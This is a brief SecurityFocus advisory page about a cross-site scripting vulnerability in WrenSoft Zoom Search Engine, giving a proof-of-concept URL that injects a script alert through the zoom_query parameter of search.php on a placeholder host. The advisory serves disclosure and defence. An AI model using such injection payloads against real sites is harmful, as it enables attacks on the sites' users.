info
discussion
exploit
solution
references
WrenSoft Zoom Search Engine Cross-Site Scripting Vulnerability
The following proof of concept has been supplied:
http://www.example.com/search.php?zoom_query=<script>alert("hello")</script><script>alert("hello")</script>
Privacy Statement
Copyright 2010, SecurityFocus